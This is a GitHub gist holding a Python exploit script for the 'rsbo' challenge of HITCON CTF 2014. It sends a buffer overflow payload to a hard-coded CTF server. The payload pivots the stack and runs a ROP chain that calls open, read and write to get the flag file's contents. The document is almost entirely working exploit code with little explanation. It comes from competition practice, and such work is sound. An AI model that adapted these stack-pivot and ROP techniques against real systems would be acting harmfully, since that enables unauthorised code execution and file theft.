Skip to content

Instantly share code, notes, and snippets.

@g05u g05u/xpl_rsbo.py
Created Aug 18, 2014

Embed
What would you like to do?
Hitcon-ctf rsbo exploit
#!/usr/bin/env python
from struct import *
from nulllife import *
new_ebp = 0x0804a100
plt_read = 0x080483E0
plt_open = 0x08048420
plt_write = 0x08048450
flag_str = 0x080487D0
pop2ret = 0x0804879E
pop3ret = 0x0804879D
leaveret = 0x08048535
read_80_bytes = 0x0804865C
address_writable = 0x0804a200
s = NullSocket("210.61.8.96", 51342)
stage1 = "\x00" * 108 #padding to ret
#stage1: pivot stack
stage1 += pack("<I", read_80_bytes) #read
stage1 += pack("<I", pop2ret)
stage1 += pack("<I", 0x0804a100) #address writable
stage1 += pack("<I", new_ebp) #new ebp
stage1 += pack("<I", leaveret)
#stage2: open y read flag
stage2 = pack("<I", 0x41424344)
stage2 += pack("<I", plt_open) #open
stage2 += pack("<I", pop2ret)
stage2 += pack("<I", flag_str) #flag_string
stage2 += pack("<I", 0) #flag
stage2 += pack("<I", plt_read) #read
stage2 += pack("<I", pop3ret)
stage2 += pack("<I", 3) #fd
stage2 += pack("<I", address_writable) #address writable
stage2 += pack("<I", 100) #length
stage2 += pack("<I", plt_write) #write
stage2 += pack("<I", pop3ret)
stage2 += pack("<I", 1)
stage2 += pack("<I", address_writable)
stage2 += pack("<I", 100)
payload = stage1 + stage2
s.write(payload)
print s.readuntil("\x00")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.